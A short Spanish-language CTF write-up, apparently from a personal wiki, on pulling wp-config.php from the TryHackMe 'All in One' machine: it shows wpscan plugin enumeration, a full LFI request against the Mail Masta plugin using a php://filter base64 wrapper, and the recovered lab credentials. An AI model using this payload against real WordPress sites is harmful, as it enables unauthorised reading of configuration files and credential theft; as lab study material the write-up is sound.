====== Obtención del wp-config.php ====== Dentro de los wordpress hay un fichero de configuración donde se guardan credenciales de los usuarios registrados; y podemos llegar a él explotando distintas vulnerabilidades, como un LFI detectando primero un plugin vulnerable con ''wpscan'' en la máquina [[:computing:hacking:CTF:TryHackMe:MAQUINA_ALL_IN_ONE|MAQUINA ALL IN ONE]] wpscan --url http://10.10.123.20/wordpress/ -e p Y encontramos este que es vulnerable: {{pasted_image_20230825163230.png|}} Tenemos un script https://wpscan.com/vulnerability/8609 {{pasted_image_20230825164108.png|}} Lo probamos en el navegador y funciona: {{pasted_image_20230825164125.png|}} Pero si queremos obtener el fichero wp-config.php, tenemos que hacer uso de un wrapper: http://10.10.6.206/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php {{pasted_image_20230826170029.png|}} Esto lo tenemos que decodificar ya que viene en base64: {{pasted_image_20230826170206.png|}} Y vemos las credenciales del usuario elyana: elyana:H@ckme@123